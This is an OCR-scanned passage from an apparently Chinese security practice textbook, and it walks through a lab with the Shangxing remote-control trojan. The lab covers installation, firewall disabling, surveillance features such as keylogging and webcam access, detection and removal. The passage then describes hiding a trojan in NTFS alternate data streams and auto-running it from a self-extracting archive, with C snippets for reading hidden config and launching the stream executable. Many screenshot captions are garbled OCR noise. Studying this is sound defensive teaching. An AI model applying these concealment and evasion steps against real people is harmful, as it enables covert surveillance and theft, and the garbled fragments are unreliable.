一 样 ,实现 隐藏 . 自 启 动 .注入 IE 浏览 器 并 发 送 网 络 连接 请 求 等 功能 ,无 窗口 的 IE 浏览 器 被 
启动 并 被 注入 DLL, MXA DLL 完成 发 起 网 络 连接 、 接 受命 令 . 返 回收 集 数据 等 功能 。 
图 10-17 显示 任务 管理 器 中 的 IEXPLORE. EXE 进程 。 

以 上 操作 是 在 关闭 防火 墙 的 情况 下 进行 的 。 打 开 360 安全 卫士 但 不 扫描 ,启动 360 流 
量 防 火 墙 显示 如 图 10-18 所 示 的 网 络 连接 信息 ,可 以 看 到 IEXPLORE. EXE 开启 本 地 端口 
1516( 本 地 IP 地 址 为 192. 168. 0. 105 ,虚拟 机 ) , 正 向 IP 地 址 为 192. 168. 0. 103( 主 控 端 主 
机 ) 的 80 端口 发 送 网 络 连接 请 求 包 . 且 被 认为 是 安全 的 ,至 此 木马 安装 成 功 。 

ESET NOD32 杀毒 软件 对 内 存 进行 扫描 时 ,会 报 IEXPLORE. EXE 是 病毒 ,如 图 10-19 所 
示 , 但 无 法 清除 ,这 是 因为 硬盘 中 的 IEXPLORE. EXE 文件 本 身 没 问 题 ,只 是 木马 启动 
IEXPLORE. EXE 后 将 木马 DLL 注入 其 进程 中 而 已 。 
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do 5 PFP LJ 
wO 选项 @) EEV 关机 QD 帮助 QH) 
应 用 程序 | 进程 [性 能 “| 联网 [用户 | 


映像 名 称 PID FPS m 
avshadow. exe 3000 SYSTEM 

cmd. exe 3360 Administrator 
Conime.exe 1432 Administrator 

csrss, exe 656 SYSTEM 

ctfmon. exe 2780 Administrator 

DiskPro. exe 1788 SYSTEM 

explorer, exe 2740 Administrator 
Generate. exe 1164 Administrator 


F: Administrator 
etinfo. exe 1840 SYSTEM 


3602 PAAA 


DOARE % "PJ 


SAAE 。 ”网 络 体检 保护 同 连 。 局 域 同 防护 36 小 助手 DRA BAIR 


当前 有 11 MPFCERTEGHRA MET 23 个 连接 ， 暂 未 发 现 可 疑 程序 存在 . 
看 IT、 下 载 、 峙 天 、 玩 同 贞 游戏 时 会 建立 网 络 连 接 ,用 采 元 成 与 对 方 的 联系 和 数据 传 关 。 娩 可 以 查看 和 管理 这 接 ,提高 癌 结 安 全 性 
进程 RE hau 本 地 IP 目标 IP 目标 入口 Binti 
E svchost.exe 0.0.0.0 0.0.0.0 
E System( 系 纺 进 程 ) — = cp 0.0.0.0 0.0.0.0 
E System (RHE) 4 CP 192.168.0.105 0.0.0.0 
8 iExPLORE EXE CP 192.168.0.105 192.168.0.103 


图 10-18 360 流量 防火 墙 


计算 机 扫描 


日 志 


正在 扫描 日 志 

病毒 库 版 本 : 7086 (20120425) 

日 期 2014/3/16 时 间 : 0:05:02 

已 扫 撕 的 磁盘 、 文 件 夫 和 文件 : 系统 内 存 

系统 内 存 > C\Program Files\internet Explorer\iexplore.exe - Win32/Induc.A 病毒 的 变种 -无 法 清除 | 
PARAS 621 

发 现 的 威胁 数 : 1 

已 清除 对 参数 :0 

完成 时 间 : 0:05:06 总 扫 撕 时 间 : 4 秒 (00:00:04) 
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(2) 连接 和 控制 木马 。 

在 主 控 端 主机 (IP 地 址 为 192. 168. 0. 103) 上 先 关闭 Windows 的 防火 墙 ,其 目的 是 容许 
外 来 的 网 络 连接 请 求 包 到 达 控 制 端 主 程序 rejoice. exe 的 80 端口 ,以 建立 网 络 连接 。 

实现 关闭 防火 墙 有 多 种 方式 。 第 一 种 是 通过 控制 端 主 程序 rejoice. exe 的 选项 下 拉 菜 
单 “ 关 闭 本 机 防火 墙 ?命令 ,如 图 10-20 所 示 ,该 方法 只 适用 Windows XP 操作 系统 。 

第 二 种 是 通过 SC 命令 或 netsh 命令 停止 Windows Firewall, 参 见 实践 6。 


图 10-20 rejoice. exe 的 选项 下 拉 菜 单 


第 三 种 是 常用 的 交互 式 方法 , 打 来 控制 面板 中 的 Windows 防火 墙 设置 对 话 框 ,选择 关 
闭 防火 墙 单 选 按 钮 即 可 。 

控制 主机 的 防火 墙 关闭 后 ,等 待 一 小 段 时 间 就 会 出 现 如 图 10-21 所 示 的 上 线 信息 ,显示 
了 被 控 计 算 机 的 IP 地址 、 地 区 、 机 器 名 、 网 络 类 型 有 无 摄像 头 、 操 作 系统 .CPU 等 信息 。 


用 户 |Ma | 视频 | 系统 c | 
sfx-69368387b..， 内 网 无 WiskP 1#3193Wtz 


OOO , 
一 | Mt At TELH HAAN Sewe ms 。 修改 @ se 
2014383 A6 E 22:37 运 得 主机 :192.168.0105 EE CEFER ORETERERERE EFNI e 


图 10-21 上 线 信息 


选择 上 线 主机 ,可 以 实现 以 下 功能 : 

文件 传输 、 删 除 、 新 建 , 搜 索 .查看 等 操作 。 

© 抓 屏 以 及 屏幕 操作 ,控制 鼠标 键盘 等 。 

© 打开 摄像 头 、 话 简 ,获取 音频 和 视屏 数据 等 。 

D 系统 管理 ,包括 进程 管理 .服务 管理 ,注册 表 管 理 、 窗 口 管理 .记录 键盘 等 。 

10-22 到 图 10-26 所 示 为 部 分 功能 的 截图 。 其 中 图 10-23 显示 在 对 虚拟 机 进行 控制 
时 ,IEXPLORE. EXE 的 网 络 连 接 被 认为 是 安全 的 ,图 10-25 显示 IEXPLORE. EXE 被 注入 
木马 DLL 后 就 很 难 检测 出 来 。 

故障 诊断 : 控制 主机 的 防火 墙 关闭 后 ,等 待 一 段 时间 后 如 果 没 有 出 现 上 线 信息 , 则 从 以 
下 几 个 方面 检查 。 

O 检查 虚拟 机 到 主机 的 网 络 是 否 连通 ,命令 : ping 192. 168.0. 103( 备 注 : IP 地 址 改 为 
实践 主机 地 址 ) 。 如 果 网 络 是 连通 的 , 则 loss 为 0% .如果 不 通则 loss 为 100% ,需要 进一步 
检查 虚拟 机 的 网 络 设置 。 
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管理 网 这 Hüte APAE 局 绑 网 防护 36 小 助手。 PAMA MAER AE 


当前 有 12 个 程序 已 连接 或 尝试 连 接 网 络 ， 共 建立 23 个 连接 ， 暂 未 发 现 可 线程 序 存在 。 
看 网 页 下载、 有 天 、 先 同治 六 允 时 会 过 立 网 络 庄 接 ， 用 来 完成 与 对 方 的 联系 和 从 卑 传送。 人 可 以 查看 和 管理 这 接 , Iaryasm+ie. 
进程 mQ sise +n RGP 目标 滴 吕 ”目标 局 犀 地 
@ seotray.exe we 0000 0000 
$ 360tray.exe ue 
而 IEPLoEBE To 
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Enetinfo.exe TI 0000 0.0.0.0 
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10-23 屏幕 控制 窗口 


FARA | 进程 管理 | 服务 管理 | 注册 表 管理 | 窗口 查看 | 软件 管理 | PREF HASED 


2014-3-6 


22:41:24 HORA :Q60NetFosClass 窗口 标 是 360 流量 防火 培 


2014-3-6 22:41:29 窗口 类 名 :9360NetnonClass 窗口 标题 


2014-3-6 22:41:31 窗口 类 名 :Froman 窗口 标题 :Progran Manager 
2014-3-6 22:41:36 窗口 类 名 :Hotepad 窗口 标题 :新 建 文本 文档 . txt - 记事 本 
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图 10-24 键盘 记录 窗口 
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图 10-25 进程 管理 窗口 
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图 10-26 ”服务 管理 窗口 
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© 查看 如 图 10-23 所 示 的 360 流量 防火 墙 是 否 显示 IEXPLORE. EXE 向 主 控 主 机 发 
送 连 接 请 求 ,如果 没有 则 木马 安装 不 成 功 ,检查 当前 账户 是 否 具有 管理 员 的 权限 。 

@ 查看 如 图 10-12 所 示 的 显示 信息 ,检查 rejoice. exe 控制 端 主 程序 开启 80 端口 是 否 
成 功 ,如 果 不 成 功 ,说 明 80 端口 已 经 被 其 他 软件 (如 Web 服务 器 ) 占 用 ,要 么 关闭 占用 该 端 
口 的 软件 ,要 么 改变 木马 程序 的 端口 ,如 果 改 端口 则 需要 重新 生成 木马 服务 器 并 安装 。 

(3) 分 析 木 马 原理 。 

上 兴 木 马 有 很 多 变种 ,实践 中 的 “上 兴 远 程控 制 " 是 比较 典型 的 版 本 ,主要 特点 是 服务 启 
动 .IE 注入 和 文件 捆绑 。 

O 服务 启动 。 

Sx_server. exe 程序 启动 后 ,首先 安装 并 启动 系统 服务 ,然后 可 以 自 删 除 。 安 装 的 服务 
名 为 WinQvod, 服 务 显示 名 称 为 WinQvodPlayer ,描述 为 “系统 播放 器 ”, 如 图 10-27 所 示 。 


WinQvodPlayer 的 属性 (本 地 计算 机 ) 


XED MEO SEV MW 

7 (mg 关系 

+ mimi @m = ú" [7A zs [Wg [masa 
E2Z£W. Winĝvod 


服务 (本 地 ) 


sasko Fanor 


rindors Tise 
indors Presen 


An Manage. FED CEL 恢复 中 
Windors Manage. 
当 从 此 处 启动 服务 时 ， 悠 可 指定 所 适用 的 启动 参数 , 


局 动 参数 吕 ) 


amw | 


图 10-27 系统 服务 管理 器 


其 中 可 执行 路 径 为 C:\Program Files\Common Files\Microsoft Shared\ MSINFO\ 
QQMin. exe -k。 

QQMin. exe 是 木马 的 主 程序 ,参数 -k 只 是 起 着 伪装 作用 。 图 10-27 中 所 有 的 系统 服务 
信息 皆 来 源 于 注册 表 项 HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControl\ Services 
中 ,如 图 10-28 所 示 。 


qM Ria 


C:\Program FilesACeemen Files\Microsoft Shwred MSINFONQQNin exe -1 
LocalSysten 


&) 
Ox00000110 (272) 


10-28 ”WinQvod 服务 注册 项 


WinQvod 服务 的 启动 方式 为 自 启动 ,启动 后 首先 在 内 存 中 剥离 出 木马 DLL ,然后 启动 
无 窗口 的 IEXPLORE. EXE 进程 ,接着 将 木马 DLL 注入 到 IEXPLORE. EXE 进程 ,最 后 
WinQvod 服务 的 主 程序 QQMin. exe 退出 ,所 以 图 10-27 显示 的 该 服务 已 经 停止 了 。 

手动 删除 WinQvod 服务 即 可 移 去 该 木马 ,可 以 在 cmd 下 输入 命令 “sc delete 
WinQvod”, 或 者 在 注册 表 中 直接 删除 WinQvod 服务 的 注册 项 ,然后 删除 QQMin. exe 木马 
程序 。 另 外 杀毒 软件 很 容易 识别 QQMin. exe 为 木马 病毒 程序 。 

OIEA. 

将 DLL 注入 IEXPLORE. EXE 进程 中 的 方法 除了 实践 8 中 介绍 的 常用 方法 外 ,还 有 内 
存 空 间 蔡 换 法 和 线程 注入 法 等 ,这 两 种 方法 都 涉及 复杂 的 PE 文件 结构 ,将 在 高 级 篇 中 讨 
论 。 对 于 QQMin. exe 启动 的 IEXPLORE. EXE 进程 ,虽然 杀毒 软件 较 难 判断 其 安全 性 ,但 
无 窗口 的 IEXPLORE. EXE 进程 是 可 疑 的 。 

另外 基于 进程 知识 ,IEXPLORE. EXE 进程 应 该 由 Windows 资源 管理 器 Explore. exe 
启动 ,因此 IEXPLORE. EXE 的 父 进程 是 Explore. exe, 而 由 图 10-29 中 所 示 的 Process 
Explorer 工具 给 出 的 IEXPLORE. EXE 属性 对 话 框 中 的 Image 选项 卡 中 显示 其 父 进程 无 ， 
这 是 不 正常 的 ,这 是 因为 QQMin. exe 启动 IEXPLORE. EXE 进程 后 马上 退出 。 当 然 这 种 
判断 方法 也 要 分 情况 ,例如 计算 机 在 运行 过 程 中 ,Explore. exe 进程 意外 退出 , 即 Windows 
桌面 消失 了 ,从 任务 管理 器 的 “文件 ”的 下 拉 菜 单 “ 新 建 任务 "运行 Explore. exe, 重 新 启动 
Windows 桌面 , 则 先前 已 经 运行 的 用 户 进程 的 父 进 程 为 无 。 
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图 10-29 IEXPLORE. EXE 属性 对 话 框 


远程 访问 80 端口 是 木马 被 控 端 经 常 使 用 的 方法 ,目的 是 避免 防火 墙 的 阻拦 ,访问 80 端口 
通常 采用 HTTP 协议 ,而 木马 利用 80 端口 传送 数据 包 的 格式 并 不 遵循 HTTP 协议 。 利 用 抓 
包 程序 如 Wireshark 对 本 机 进出 数据 包 进行 捕获 分 析 , 能 发 现 不 正常 的 网 络 连接 。 如 图 10-30 
所 示 ,Wireshark 显示 的 网 络 数据 包 中 ,本 地 IP 192. 168. 0. 105 和 远程 IP 192. 168. 0. 103 


实践 教程 


之 间 的 HTTP 协议 数据 包 被 描述 为 Continuation or non-HTTP traffic, 其 中 Continuation 
是 指 该 数据 包 可 能 是 上 一 个 较 大 HTTP 协议 数据 包 的 一 部 分 ,或 者 non-HTTP traffic 是 指 
该 数据 包 不 符合 HTTP 协议 。 由 此 可 以 判断 该 网 络 连 接 不 正常 ,然后 可 以 依据 本 地 端口 号 
检查 一 下 是 哪个 进程 发 起 的 该 网 络 连 接 。 


图 10-30 Wireshark 捕获 数据 包 


图 10-31 显示 该 数据 包 的 HTTP 协议 部 分 所 包含 的 数据 。 从 数据 分 析 来 看 ,这 也 不 是 
Web 访问 的 数据 包 格 式 , 包 中 出 现 的 数据 片段 sfx-6936838 是 被 控 计算 机 名 , Windows XP 
是 操作 系统 类 型 ,20130522 是 备注 信息 ,显然 该 木马 的 通信 是 没有 加 密 的 ,也 就 是 明文 通 
信 , 而 对 通信 数据 进行 压缩 和 加 密 是 木马 常用 的 手段 。 
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图 10-31 HTTP 协议 部 分 数据 信息 


需要 注意 的 是 ,如 果 系 统 内 核 的 信息 被 修改 (参见 高 级 篇 实践 11) ,这 些 判 别 方法 可 能 
无 效 ,例如 木马 进程 隐藏 、 父 进程 名 称 可 以 任意 修改 以 及 特定 的 网 络 连 接 信息 隐藏 等 。 

© 文件 拥 绑 。 

利用 沙 箱 软件 Sandboxie 可 以 分 析 文 件 捆绑 中 包含 的 程序 。 将 拥 绑 文 件 NOTEPAD. 
EXE $A Sandboxie Control 中 运行 , 则 运行 程序 的 变化 过 程 如 图 10-32 所 示 。 

图 10-32(a) 显 示 捆 绑 文件 NOTEPAD. EXE 运行 后 , 即 分 离 Sx_server. exe 文件 和 正常 
的 NOTEPAD. EXE 文件 ,并 用 命令 行 的 方式 启动 Sx_server. exe 和 正常 的 NOTEPAD. 
EXE, 也 就 有 了 两 个 cmd. exe 在 运行 ,Sx_server. exe 先 运行 起 来 ,正常 的 NOTEPAD. EXE 
延迟 启动 。 

图 10-32(b) 显 示 捆 绑 文件 NOTEPAD. EXE 退出 ,并 且 Sx_server. exe 完成 木马 安装 ， 
启动 了 服务 主 进程 QQMin. exe, 这 时 正常 的 NOTEPAD. EXE 也 已 经 启动 .QQMin. exe 又 
用 命令 行 的 方式 准备 启动 [EXPLORE. EXE 进程 ,因此 有 一 个 cmd. exe 在 运行 。 

图 10-32(c) 显 示 QQMin. exe 完成 正 注入 后 退出 ,IEXPLORE. EXE 进程 开始 运行 并 
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图 10-32 Sandboxie 内 运行 程序 的 变化 过 程 


发 起 对 外 连接 ,而 正常 的 NOTEPAD. EXE 保持 运行 状态 不 变 。 

沙 箱 软件 Sandboxie Control 也 可 以 分 析 搁 绑 文 件 NOTEPAD. EXE 释放 的 文件 ,如 
图 10-33 所 示 。 在 图 10-33(a) 中 选择 右键 菜单 Explore Contents. 10-33(b) 中 的 文件 夹 
drive 中 存放 着 创建 了 的 文件 。 


® DefaultBor 
O 编辑 EE) SEV BEW IAV 


Rename Sandbox 
Renoye Sandbox 


图 10-33 浏览 释放 的 文件 


图 10-34(a) 一 (c) 显 示 了 拥 绑 文 件 NOTEPAD. EXE 所 创建 的 文件 及 其 路 径 。 一 共有 
3 个 文件 ,正常 的 NOTEPAD. EXE 释放 在 C 盘 ,Sx_server. exe 释放 在 C:\Program Files 
下 ,而 QQMin. exe 释放 在 C:\Program Files\Common Files\Microsoft Shared\ MSInfo F , 
这 些 信 息 正 如 图 10-15 中 设置 的 一 样 。 

可 见 沙 箱 Sandboxie 有 助 于 分 析 病 毒 文 件 运行 细节 而 不 危害 系统 自身 。 

2) 木马 伪装 实践 

木马 常 利用 实践 9 中 所 介绍 的 NTFS 流 文件 存储 方法 , 寄 住 在 其 他 格式 的 文件 中 , 达 
到 伪装 和 隐藏 的 功能 。 一 般 有 木马 配置 信息 隐藏 和 木马 主 程序 的 伪装 。 

(1) 信息 隐藏 。 

木马 的 启动 往往 需要 读 取 一 些 配 置信 息 ,如 通信 和 密 钥 、 主 控 端 IP 地 址 及 端口 `. Web/ 
FTP 网 站 IP 地 址 及 端口 等 。 由 于 绝 大 多 数 杀毒 软件 并 不 扫描 NTFS 流 文件 ,因此 木马 的 
配置 信息 经 加 密 后 作为 流 文件 寄 住 在 系统 文件 或 文件 夹 中 ,如 C:\Program Files\Common 
Files 这 样 的 文件 夹 中 , 这些 文 件 夹 在 Windows XP, Windows 2003, Windows 2008, 
Windows 7. Windows 8 等 系统 中 皆 存 在 ,具有 通用 性 强 的 特点 。 
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文件 四 REO SEV BAW IRU EYW 
Qa- O- 8 prr Err |m 
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(o) 
10-34 NOTEPAD. EXE 创建 的 文件 及 其 路 径 


在 代码 中 使 用 函数 CreateFile 和 ReadFile 打开 和 读 取 流 文件 ,提取 解密 即 可 ,这 和 用 
Notepad 命令 和 WinHex 工具 查看 结果 一 样 。 具 体 读 取代 码 如 下 。 


CHAR * pBuffer; // 用 于 存储 流 文件 内 容 
DWORD RSize; 
int fileSize = 0; 
int i; 
HANDLE hOpenFile = (HANDLE)CreateFile("C:\\Program Files\\Common Files: mima", GENERIC_ 
READ, FILE_SHARE_ READ, NULL, OPEN_EXISTING, NULL, NULL); 
if (hOpenFile == INVALID HANDLE VALUE){ 
hOpenFile = NULL; 
MessageBoxA(NULL, "Can not open the file", "Playwav", MB_OK); 
) 
fileSize = GetFileSize(hOpenFile, NULL); // 获 取 文 件 大 小 
pBuffer = (CHAR * ) malloc(fileSize); // 分 配 存储 空间 
ReadFile(hOpenFile, pBuffer, fileSize, &RSize, NULL);  // 读 取 流 文件 内 容 


函数 CreateFile 一 次 只 能 打开 主 文件 或 流 文件 中 的 一 个 。 函 数 WriteFile 可 以 将 数据 
写 入 流 文件 ,实现 type 命令 的 功能 。 

(2) 伪装 隐秘 启动 。 

实践 9 中 提 过 带 有 流 文件 的 主 文件 不 能 跨 机 复制 .但 当主 文件 如 图 9-7 所 示 的 压缩 后 ， 
就 可 以 跨 机 复制 ,复制 到 目的 主机 解压 即 可 (前 提 为 NTFS 文件 系统 ) 。 

在 Windows XP 系统 中 ,可 以 将 主 文件 制作 成 自 解压 文件 ,双击 后 就 会 自动 运行 藏 在 主 
文件 中 的 木马 主 程序 。 假 设 文件 夹 test 中 附加 了 木马 主 程序 muma. exe( 偷 窥 者 的 被 控 端 ), 
按 图 9-7 所 示 的 方法 压缩 为 test. rar, 将 其 用 WinRAR 压缩 文件 管理 器 打开 ,如 图 10-35(a) 所 
示 。 单 击 “ 自 解压 格式 ”选项 卡 ,图 10-35(b) 显 示 “ 高 级 自 解压 选项 ”对 话 框 ,在 “设置 ”选项 卡 的 
“解压 后 运行 "中 输入 :“test:muma. exe”, 单 击 “ 确 定 ” 按 钮 后 生成 自 解压 文件 test. exe, 如 
图 10-35(c) 所 示 。 


433 
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图 10-35 生成 自 解压 文件 


对 未 压缩 的 文件 夹 test 进行 杀毒 扫描 , 则 不 同 的 杀毒 软件 得 到 不 同 的 结果 ,如 图 10-36 所 示 。 
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图 10-36 杀毒 软件 扫描 结果 


但 是 用 不 同 杀毒 软件 对 压缩 包 文件 test. rar 和 自 解压 文件 test. exe 进行 扫描 时 , 皆 未 
检测 出 问题 。 双 击 自 解压 文件 test. exe 后 , 单 击 * 安 装 ?按钮 后 ,杀毒 软件 即 可 发 现 其 中 的 病 
毒 E:\3Ntest:muma. exe, 如 图 10-37 所 示 ,这 是 由 于 muma. exe 是 比较 经 典 的 木马 ,所 以 杀 
毒 软件 能 查 出 来 。 如 果 muma. exe 是 一 个 流氓 程序 .广告 程序 或 经 免 杀 处 理 的 木马 , 则 随 着 
压缩 包 的 解压 , 流 文 件 muma. exe 会 在 后 台 秘 密 启动 起 来 。 

手工 排查 的 方法 : 对 于 自 解压 的 文件 先 不 去 双击 运行 它 ,而 是 通过 右 击 “用 WinRAR 打 
开 ” 进 行 查看 ,会 发 现 旁边 会 有 参数 ,其 中 就 有 自 解压 运行 参数 命令 的 暴露 ,如 图 10-38 所 示 。 

需要 说 明 的 是 ,上 兴 木 马 的 安装 程序 Sx_server. exe 如 果 作 为 流 文件 启动 则 不 成 功 ,这 
是 由 于 上 兴 木 马 需 要 分 离 文 件 , 而 这 些 文件 数据 作为 流 数据 存储 ,但 上 兴 木 马 无 法 处 理 流 数 
据 。 自 解压 启动 可 以 在 Windows XP 系统 中 实现 ,但 在 Windows 7 系统 中 却 不 行 ,但 使 用 
CreateProcess 函数 可 以 启动 流程 序 , 代 码 如 下 。 
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Ët WinRAR 自 解压 文件 


。 单 击 安装 按钮 开始 解压 。 


. 使 用 AMR 按钮 从 目录 树 中 选择 目标 文件 夹 。 它 也 可 以 手 
A. 


GR: 


* RREO EHATE, EXNER EHSA] ETENN - CIEE 


有 木马 试图 攻击 您 的 电脑 ，360 已 成 功 拦截 。 


本 马 文件 : EB ENVattestmuma exe 


本 马 名 称 : Win32/Trojan.a27 


(b) 
图 10-37 自 解压 发 现 病毒 
Ë test. exe - WinRAR (评估 版 本 ) EOR) 
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Wb oD 
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Em WES 查看 b # 
m S... - BEERE RAR EBI, ME) 
etup=test: muma. exe 
Sit 1 PR 
图 10-38 用 WinRAR 打开 界面 
STARTUPINFO si = { sizeof(si) }; 
PROCESS_INFORMATTON pi; 
si.dwFlags = STARTF_USESHOWWINDOW; 
si. wShowWindow = TRUE; 
BOOL bRet = CreateProcess ( 
lpCmdLine, // 指 定 可 执行 文件 的 文件 名 为 "E:\3\test:muma. exe" 
NULL, 
NULL, // 默认 进程 安全 性 
NULL, // 默认 进程 安全 性 
FALSE, // 指定 当前 进程 内 句柄 不 可 以 被 子 进程 继承 
0, // 为 新 进程 创建 一 个 新 的 控制 台 窗口 
NULL, // 使 用 本 进程 的 环境 变量 
NULL, // 使 用 本 进程 的 驱动 器 和 目录 
&si, 
Epi) ; 


以 上 述 代码 为 核心 ,生成 流程 序 的 工具 testNTFS. exe, 使 用 方法 是 在 命令 行 输入 
“testNTFS. exeE:\3\test:muma. exe”, 则 流程 序 muma. exe 启动 起 来 ,这 种 方法 适用 于 包 
括 Windows XP 及 其 以 上 版 本 的 Windows 系统 。 


6. 思考 题 
能 完全 信任 杀毒 软件 吗 ? 依靠 一 种 杀毒 软件 安全 吗 ? 
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Windows 内 核 基 本 分 析 


1. 实践 目的 
理解 Windows 内 核 的 基本 结构 。 
2. 实践 环境 


(1) 安装 360 安全 卫士 的 Windows XP 或 Windows 7 虚拟 机 。 
(2) 实践 工具 : XueTr. exe,i386kd. exe,Dependency Walker。 


3. 名 词 解释 


(1) 蓝屏 : 蓝屏 是 Windows“ 亡 我 ”的 一 种 自我 保护 措施 ,是 因为 系 
统 不 知道 内 核 错误 是 否 能 被 隔离 出 来 从 而 不 伤害 系统 的 其 他 程序 与 数 
据 , 或 者 该 组 件 将 来 是 否 能 够 恢复 正常 ,如 果 选 择 了 内 存 dump, 就 会 产 
生 一 个 名 为 memmory. dmp 的 文件 ,保存 系统 发 生 内 核 错误 时 的 内 存 快 
照 ,可 供 检查 。 

(2) API: Application Programming Interface, 应 用 编程 接口 ,是 操 
作 系 统 留 给 应 用 程序 的 一 个 调用 接口 ,应 用 程序 通过 调用 操作 系统 的 
API 而 使 操作 系统 去 执行 应 用 程序 的 命令 (动作 )。API 函数 包含 在 
Windows 系统 目录 下 的 动态 链接 库 文件 中 。 

(3) Native API: 原始 API 函数 或 原生 API 函数 ,是 真正 使 操作 系 
统 去 执行 应 用 程序 命令 的 代码 ,由 内 核 模块 ntoskrnl. exe( 或 ntkrnlpa 
.exe) 和 win32k. sys 导出 的 函数 。 在 内 核 中 由 服务 描述 符 表 (The Service 
Descriptor Tables) 保 存 Native API 的 相关 信息 ,如 函数 在 内 存 中 加 载 
地 址 。 

(4) 回调 函数 : 一 个 通过 函数 指针 调用 的 函数 。 把 函数 的 指针 (地 
址 ) 作 为 参数 传递 给 另 一 个 函数 , 当 这 个 指针 被 用 来 调用 其 所 指向 的 函 
数 时 , 称 为 回调 函数 。 回 调 函 数 不 是 由 该 函数 的 实现 方 直接 调用 ,而 是 
在 特定 的 事件 或 条 件 发 生 时 由 另外 的 一 方 调用 的 ,用 于 对 该 事件 或 条 件 
进行 响应 。 

(5) 符号 文件 : 符号 文件 (Symbol Files) 是 一 个 数据 信息 文件 ,符号 
文件 以 . pdb 为 扩展 名 , 它 包含 了 应 用 程序 二 进 制 文件 (例如 EXE, DLL 
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等 ) 的 调试 信息 ,专门 用 来 作 调 试 之 用 。 

(6) SSDT 表 : 系统 服务 描述 符 表 (System Services Descriptor Table)。 这 个 表 就 是 一 
个 把 RING3 的 Win32 API 和 RINGO 的 内 核 API 联系 起 来 ,主要 处 理 Kernel32. dll 和 
ntdll. dll 中 的 系统 调用 。 

(7) ShadowSSDT 表 : 阴影 系统 服务 描述 表 (Shadow System Services Descriptor 
Table, 亦 可 称 SSSDT) 跟 SSDT 的 结构 类 似 ,主要 处 理 图 形 、 用 户 相 关 的 函数 (gdi32. dll、 
user32. dll) 。 

(8) 系统 调用 : 由 操作 系统 实现 提供 的 所 有 系统 调用 所 构成 的 集合 , 即 程 序 接口 或 应 
用 编程 接口 (Application Programming Interface. API)。 是 应 用 程序 同系 统 之 间 的 接口 。 


4. 预备 知识 


1) 系统 架构 
自 Windows XP 系统 以 来 ,Windows 的 系统 架构 基本 未 变 ,如 图 11-1 所 示 。 
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图 11-1 Windows 系统 架构 


advapi32.dll 
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User Mode 。 
Kernel Mode 


图 11-1 中 user32. dll, advapi32. dll, gdi32. dll, rpcrt4. dll 以 及 kernel32. dll( 还 有 其 他 
DLL ,如 version. dll、shell32. dll 和 comct132. dlD) 实 现 了 基本 的 Win32 API。 所 有 的 Win32 
API 调用 最 后 都 转移 到 了 ntdll. dll ,而 ntdll. dll 又 将 其 转移 到 了 ntoskrnl. exe, 

ntdll, dll 是 一 个 操作 系统 组 件 , 它 为 Native API 准确 地 提供 服务 ,ntdll. dll 是 Native 
API 在 用 户 模式 下 的 前 端 。Native API 真正 的 接口 在 ntoskrnl. exe 和 win32k. sys 中 实现 。 
它 就 是 Windows NT 操作 系统 内 核 。 例 如 打开 一 个 文件 的 调用 流程 如 下 : 

(1) 在 软件 中 单 击 打开 文件 菜单 或 按钮 。 

(2) 菜单 或 按钮 响应 函数 会 调用 OpenFile 函数 (由 kernel32. dll 导出 ) 。 

(3) OpenFile 函数 将 打开 文件 请 求 发 给 ZwOpenFile 函数 (由 ntdll. dll 导出 ) 。 

(4) ZwOpenFile 函数 将 打开 文件 请 求 发 给 NtOpenFile 函数 (由 ntoskrnl. exe 导出 ) 。 

(5) NtOpenFile 函数 实现 具体 功能 ,并 将 结果 返回 给 ZwOpenFile 函数 ,再 由 
ZwOpenFile 函数 将 结果 返回 给 OpenFile 函数 ,最 后 显示 给 用 户 。 

当然 ,实际 调用 流程 更 为 复杂 些 。 这 些 Native API 的 函数 地 址 由 两 个 系统 表 维 护 , 即 


SSDT 表 和 ShadowSSDT 表 , 它 们 相当 于 系统 内 部 Native API 的 指向 标 ,作用 就 是 告诉 系 
统 , 需 要 调用 的 API 在 什么 地 方 ( 即 函数 的 地 址 ) 。 

不 同 操作 系统 的 SSDT 表 和 ShadowSSDT 表 中 函数 的 个 数 和 地 址 不 同 ,如 Windows 
XP 系统 SSDT 表 中 一 般 有 284 个 函数 ,而 Windows 7 则 有 401 个 。 例 如 SSDT 表 维 护 的 
函数 地 址 如 下 。 

8044c422 ,80496f58 ,804ab849 ,804aa9da,80465250 .804f4bd5 ,8049bc80 ,804ca7a5 ，……… 

其 中 的 8044c422 就 是 NtClose 函数 的 地 址 ,如 果 8044c422 值 被 修改 , 则 称 为 内 核 钩 
子 。 系 统 内 核 的 信息 基本 由 结构 体 的 形式 存储 ,如 保存 进程 的 结构 体 名 为 “~_EPROCESS”， 
具体 包括 以 下 信息 。 


偏 移 量 ”成 员 变量 名 数据 类 型 

+ 0x000 Pcb : _KPROCESS 

+ 0x06c ProcessLock : _EX_PUSH_LOCK 

+0x070 CreateTime : _LARGE_INTEGER // 进 程 创建 时 间 

+0x078 ExitTime : _LARGE INTEGER // 进 程 退 出 时 间 

+ 0x080 RundownProtect : _EX_RUNDOWN_REF 

+ 0x084 UniqueProcessId :Ptr32 Void // 进 程 的 PID 

+0x174 ImageFileName : [16] Uchar // 进 程 名 称 , 如 explorer. exe 


以 上 是 Windows XP 的 内 核 ,而 Windows 7 内 核 中 的 _EPROCESS 结构 有 所 不 同 , 包 
含 更 多 的 信息 ,尺寸 也 更 大 些 , 同 理 Windows 8 也 有 所 不 同 , 只 是 基本 架构 一 样 而 已 。 偏 移 
量 是 指 当前 的 成 员 变量 在 结构 体 中 的 位 置 , 以 字 节 计算 。 

保存 进程 的 PID 和 名 称 的 结构 体 变量 在 _EPROCESS 结构 体 中 的 位 置 是 随 操作 系统 
版 本 的 不 同 而 异 的 ,也 就 是 说 依赖 系统 的 内 核 结构 的 软件 (如 杀毒 软件 等 ) 的 安装 有 版 本 
要 求 。 常 用 的 Windows 任务 管理 器 所 显示 的 进程 信息 如 图 11-2 所 示 ,其 数据 来 源 就 是 
_EPROCESS 结构 体 , 如 果 修 改 其 中 的 UniqueProcessId 和 ImageFileName 的 值 , Windows 
任务 管理 器 中 显示 的 信息 会 随 之 变化 , 且 对 进程 正常 运行 并 不 影响 。 

每 一 个 进程 对 应 一 个 _EPROCESS 结构 体 , 即 每 当 启动 一 个 新 进程 时 ,系统 会 创建 一 个 
_EPROCESS 结构 体 来 存储 新 进程 的 信息 ,这 些 结 构 体 采用 双向 循环 链表 ( ActiveProcessLinks) 
的 形式 组 织 起 来 ,如 图 11-3 所 示 。 

在 内 核 编程 时 ,只 要 找到 其 中 一 个 进程 的 EPROCESS 结构 体 ,就 可 以 通过 其 中 的 向 前 
